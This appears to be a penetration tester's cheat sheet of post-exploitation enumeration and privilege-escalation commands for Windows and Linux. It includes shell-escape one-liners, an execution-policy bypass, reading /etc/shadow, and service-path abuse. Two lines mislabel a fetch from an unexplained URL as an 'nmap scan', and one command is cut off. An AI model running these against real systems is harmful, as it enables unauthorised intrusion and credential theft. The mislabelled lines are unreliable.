Post-Exploitation Enumeration

Every environment is unique, but the techniques are still the same
Search for:
- misconfigured services
- insufficient file permission restrictions on binaries or services
- direct kernel vulnerabilities
- vulnerable software running with high privileges
- sensitive information stored on local files
- registry settings that always elevate privileges before executing a binary
- installation scripts that may contain hard coded credentials
- etc.

Windows

Don't forget to set the Execution Policy! Set-ExecutionPolicy Bypass -Scope process -Force

Automated

winPEAS
- File Transfer Techniques ~/tools/winPEASany.exe
- Execute: .\winPEASany.exe > out.txt
- You might need to run REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 to display the colors in the terminal
windows-privesc-check

Manual

PayloadsAllTheThings
pentest-everything
Check what privileges you have: whoami /priv
- Check what you can do with them: Priv2Admin
Get current username: echo %USERNAME%
Get OS version: ver
More OS info: systeminfo
Get environment variables: set
Show processes & services:
- tasklist /svc
- tasklist /v
- cmd /c sc query state= all
- Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Show all scheduled tasks: schtasks /query /fo LIST /v
- Copy the output to your kali instance and search through it with cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
List drives (must be admin): fsutil fsinfo drives
Directory listing of C: tree /F /A c:\ > tree.txt
Hosts in current domain: net view /domain
All users in current domain: net user /domain
Get more info about the specified user: net user <username>
List domain groups: net group /domain
List local Admins: net localgroup "Administrators"
List users in Domain Admins: net group "Domain Admins" /domain
List DCs for current domain: net group "Domain Controllers" /domain
Current SMB shares: net share
Active SHB sessions: net session | find / "\\"
IP configuration: ipconfig /all
Local DNS cache: ipconfig /displaydns
Get Network routs: route print
Open connections: netstat -ano
Firewall settings:
- netsh advfirewall show all
- netsh advfirewall show currentprofile
Online nmap scan: iwr https://nivenly.com/client
List all services: wmic service get displayname,pathname
- Check for entires where the PathName contains a space character and where the Path isn't surrounded by double quotation marks ""
- E.g.: C:\Program Files\My Program\My service\service.exe
- In the example above we could see if we have the permissions to place a file called My.exe under C:\Program Files\My Program\
Installed Applications and Patch Levels
- applications: wmic product get name, version, vendor (but only the ones which were installed by the windows installer)
- patch levels: wmic qfe get Caption, Description, HotFixID, InstalledOn
Readable/Writable Files and Directories:
- accesschk.exe -uws "Everyone" "C:\Program Files"
- Get-ChildItem "C:\Program Files" -Recurse | %{Get-ACL $_.FullName} | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Mounted Disks: mountvol
Device Drivers and Kernel Modules
- get all loaded drivers: driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
- get the version of the VMware drivers (change this depending on what you're trying to search for): Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
Binaries That AutoElevate
- Check if AlwaysInstallElevated is enabled (if yes any Windows installer (.msi) will have system privileges)
  - reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
  - reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Linux

Automated

linPEAS
- File Transfer Techniques ~/tools/linpeas.sh
- Make the script executable: chmod +x linpeas.sh
- Execute: ./linpeas.sh -L -a -e -P '{PASSWORD_FOR_SUDO-L}' > linpeas.txt
pspy
- File Transfer Techniques ~/tools/pspy32 OR ~/tools/pspy64
- Make the script executable: chmod +x pspyXX
- Execute: ./pspyXX -pf -i 1000
unix-privesc-check
LinEnum

Manual

pentest-everything
PayloadsAllTheThings
g0tmi1k
Check what if any sudo privileges you have: sudo -l
- nmap -> !sh
- vi -> :!bash OR :set shell=/bin/bash:shell
- python -> python -c 'import pty; pty.spawn("/bin/sh")'
- bash -> echo os.system('/bin/bash') OR /bin/sh -i
- perl -> perl —e 'exec "/bin/sh";' OR perl: exec "/bin/sh";
- ruby -> ruby: exec "/bin/sh"
- lua -> lua: os.execute('/bin/sh')
Current username: id
Current directory: pwd
Logged on users: w
Last users logged on: last -a
Process listing (top): ps aux
Network services: netstat -antup or ss -anp
IP configuration: ip a or ifconfig
Network Routs: /sbin/route or routel
Firewall settings:
- grep -Hs iptables /etc/*
- iptables -S (root needed)
Disk usage (free): df -h
Mounted file Systems:
- all mounted file systems: mount
- all drives mounted at boot time: cat /etc/fstab
- all available disks and their partitions: /bin/lsblk
Show list of users: getent passwd or cat /etc/passwd
Get the password hashes: cat /etc/shadow
Get and overview of personal files: ls -lahR /home
Show list of groups: cat /etc/group
Show OS info: cat /etc/issue
Show OS version info: cat /etc/*release*
Show kernel info: cat /proc/version
Kernel version/CPU info: uname -a
Installed pkgs (Redhat): rpm --query -all
Install RPM (-e=remove): rpm -ivh *.rpm
Installed pkgs (Ubuntu): dpkg -l
Install DEB (-r=remove): dpkg -I *.deb
Installed pkgs (Solaris): pkginfo
Installed applications (Red Hat: )rpm -a
Online nmap scan: curl https://nivenly.com/client
Cron Jobs:
- ls -lah /etc/cron*
- cat /etc/crontab
Readable/Writable Files and Directories: find / -writable -type d 2>/dev/null
Device Drivers and Kernel Modules
- get all loaded kernel modules: lsmod
- get more information about the libata module: `/sbin/
Find Root SUID files: find / -perm -u=s -type f 2>/dev/null

Relevant Note(s): Penetration Testing Anti-Virus Evasion Techniques